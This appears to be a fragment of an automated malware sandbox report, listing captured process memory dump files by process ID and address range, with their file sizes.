memory/1128-356-0x00000000052C0000-0x0000000005312000-memory.dmpFilesize
328KB
-
memory/1128-358-0x00000000052C0000-0x0000000005312000-memory.dmpFilesize
328KB
-
memory/1128-360-0x00000000052C0000-0x0000000005312000-memory.dmpFilesize
328KB
-
memory/1128-362-0x00000000052C0000-0x0000000005312000-memory.dmpFilesize
328KB
-
memory/1128-364-0x00000000052C0000-0x0000000005312000-memory.dmpFilesize
328KB
-
memory/1128-1135-0x0000000005350000-0x0000000005968000-memory.dmpFilesize
6.1MB
-
memory/1128-1136-0x0000000005A10000-0x0000000005A22000-memory.dmpFilesize
72KB
-
memory/1128-1137-0x0000000005A30000-0x0000000005B3A000-memory.dmpFilesize
1.0MB
-
memory/1128-1140-0x00000000026C0000-0x00000000026D0000-memory.dmpFilesize
64KB
-
memory/1128-1141-0x0000000005B40000-0x0000000005B7C000-memory.dmpFilesize
240KB
-
memory/1128-1142-0x00000000061E0000-0x0000000006200000-memory.dmpFilesize
128KB
-
memory/1128-1143-0x0000000006240000-0x00000000062A6000-memory.dmpFilesize
408KB
-
memory/1128-1144-0x0000000006D70000-0x0000000006DB2000-memory.dmpFilesize
264KB
-
memory/1128-1145-0x0000000006DC0000-0x0000000006E52000-memory.dmpFilesize
584KB
-
memory/1128-1146-0x0000000006FE0000-0x0000000007056000-memory.dmpFilesize
472KB
-
memory/1128-1147-0x0000000006E80000-0x0000000006E9E000-memory.dmpFilesize
120KB
-
memory/1128-1148-0x0000000007200000-0x00000000073C2000-memory.dmpFilesize
1.8MB
-
memory/1128-1149-0x00000000073D0000-0x00000000078FC000-memory.dmpFilesize
5.2MB
-
memory/1128-1150-0x0000000007E60000-0x0000000007EB0000-memory.dmpFilesize
320KB
-
memory/1128-1154-0x00000000026C0000-0x00000000026D0000-memory.dmpFilesize
64KB
-
memory/1128-350-0x00000000009C0000-0x0000000000A22000-memory.dmpFilesize
392KB
-
memory/1128-352-0x00000000026C0000-0x00000000026D0000-memory.dmpFilesize
64KB
-
memory/1128-355-0x00000000026C0000-0x00000000026D0000-memory.dmpFilesize
64KB
-
memory/1128-348-0x00000000052C0000-0x0000000005312000-memory.dmpFilesize
328KB
-
memory/1128-342-0x00000000052C0000-0x0000000005312000-memory.dmpFilesize
328KB
-
memory/1128-344-0x00000000052C0000-0x0000000005312000-memory.dmpFilesize
328KB
-
memory/1128-341-0x00000000052C0000-0x0000000005312000-memory.dmpFilesize
328KB
-
memory/1128-340-0x0000000004D10000-0x00000000052B4000-memory.dmpFilesize
5.6MB
-
memory/1500-150-0x0000000000400000-0x0000000002B71000-memory.dmpFilesize
39.4MB
-
memory/1500-134-0x0000000002D00000-0x0000000002D09000-memory.dmpFilesize
36KB
-
memory/2192-1266-0x000002B777730000-0x000002B777740000-memory.dmpFilesize
64KB
-
memory/2440-1265-0x000002B777730000-0x000002B777740000-memory.dmpFilesize
64KB
-
memory/2440-1264-0x000002B777730000-0x000002B777740000-memory.dmpFilesize
64KB
-
memory/2904-1162-0x00000000009D0000-0x0000000000A3B000-memory.dmpFilesize
428KB
-
memory/2972-136-0x00000253BED10000-0x00000253BED11000-memory.dmpFilesize
4KB
-
memory/2972-135-0x00000253BED10000-0x00000253BED11000-memory.dmpFilesize
4KB
-
memory/2972-143-0x00000253BED10000-0x00000253BED11000-memory.dmpFilesize
4KB
-
memory/2972-145-0x00000253BED10000-0x00000253BED11000-memory.dmpFilesize
4KB
-
memory/2972-146-0x00000253BED10000-0x00000253BED11000-memory.dmpFilesize
4KB
-
memory/2972-142-0x00000253BED10000-0x00000253BED11000-memory.dmpFilesize
4KB
-
memory/2972-137-0x00000253BED10000-0x00000253BED11000-memory.dmpFilesize
4KB
-
memory/2972-147-0x00000253BED10000-0x00000253BED11000-memory.dmpFilesize
4KB
-
memory/2972-141-0x00000253BED10000-0x00000253BED11000-memory.dmpFilesize
4KB
-
memory/2972-144-0x00000253BED10000-0x00000253BED11000-memory.dmpFilesize
4KB
-
memory/3048-252-0x0000000000EC0000-0x0000000001350000-memory.dmpFilesize
4.6MB
-
memory/3172-148-0x0000000002860000-0x0000000002876000-memory.dmpFilesize
88KB
-
memory/3172-209-0x00000000029C0000-0x00000000029D6000-memory.dmpFilesize
88KB
-
memory/3172-248-0x0000000007F60000-0x0000000007F76000-memory.dmpFilesize
88KB
-
memory/3328-1205-0x0000000002570000-0x00000000025A6000-memory.dmpFilesize
216KB
-
memory/3328-1251-0x0000000006630000-0x000000000664A000-memory.dmpFilesize
104KB
-
memory/3328-1243-0x0000000002700000-0x0000000002710000-memory.dmpFilesize
64KB
-
memory/3328-1208-0x0000000004E30000-0x0000000004EB6000-memory.dmpFilesize
536KB
-
memory/3328-1207-0x00000000050C0000-0x00000000056E8000-memory.dmpFilesize
6.2MB
-
memory/3328-1234-0x0000000005750000-0x0000000005760000-memory.dmpFilesize
64KB
-
memory/3328-1250-0x00000000078D0000-0x0000000007F4A000-memory.dmpFilesize
6.5MB
-
memory/3328-1209-0x00000000056F0000-0x0000000005712000-memory.dmpFilesize
136KB
-
memory/3328-1236-0x0000000006080000-0x000000000609E000-memory.dmpFilesize
120KB
-
memory/3328-1226-0x0000000002700000-0x0000000002710000-memory.dmpFilesize
64KB
-
memory/3328-1219-0x0000000002700000-0x0000000002710000-memory.dmpFilesize
64KB
-
memory/3328-1220-0x0000000005790000-0x00000000057F6000-memory.dmpFilesize
408KB
-
memory/3396-250-0x0000000000400000-0x0000000000704000-memory.dmpFilesize
3.0MB
-
memory/3676-230-0x0000000000400000-0x0000000000704000-memory.dmpFilesize
3.0MB
-
memory/3676-231-0x0000000000860000-0x0000000000869000-memory.dmpFilesize
36KB
-
memory/3696-216-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/3696-218-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/3696-208-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/3696-207-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/3696-206-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/3696-199-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/3696-198-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/3696-219-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/3696-240-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/3696-316-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/3796-310-0x0000000006700000-0x0000000006804000-memory.dmpFilesize
1.0MB
-
memory/3972-1231-0x0000021B367F0000-0x0000021B36800000-memory.dmpFilesize
64KB
-
memory/3972-1246-0x0000021B367F0000-0x0000021B36800000-memory.dmpFilesize
64KB
-
memory/3972-1240-0x0000021B36B20000-0x0000021B36B6A000-memory.dmpFilesize
296KB
-
memory/3972-1237-0x0000021B367F0000-0x0000021B36800000-memory.dmpFilesize
64KB
-
memory/3972-1233-0x0000021B367F0000-0x0000021B36800000-memory.dmpFilesize
64KB
-
memory/4092-297-0x0000000003380000-0x00000000034F3000-memory.dmpFilesize
1.4MB
-
memory/4092-298-0x0000000003500000-0x0000000003634000-memory.dmpFilesize
1.2MB
-
memory/4092-319-0x0000000003500000-0x0000000003634000-memory.dmpFilesize
1.2MB
-
memory/4496-166-0x0000000004970000-0x0000000004A8B000-memory.dmpFilesize
1.1MB
-
memory/4520-191-0x0000000000400000-0x0000000000704000-memory.dmpFilesize
3.0MB
-
memory/4712-1186-0x00000150F21E0000-0x00000150F21F0000-memory.dmpFilesize
64KB
-
memory/4712-1185-0x00000150F21E0000-0x00000150F21F0000-memory.dmpFilesize
64KB
-
memory/4996-318-0x00007FF703AA0000-0x00007FF703E5D000-memory.dmpFilesize
3.7MB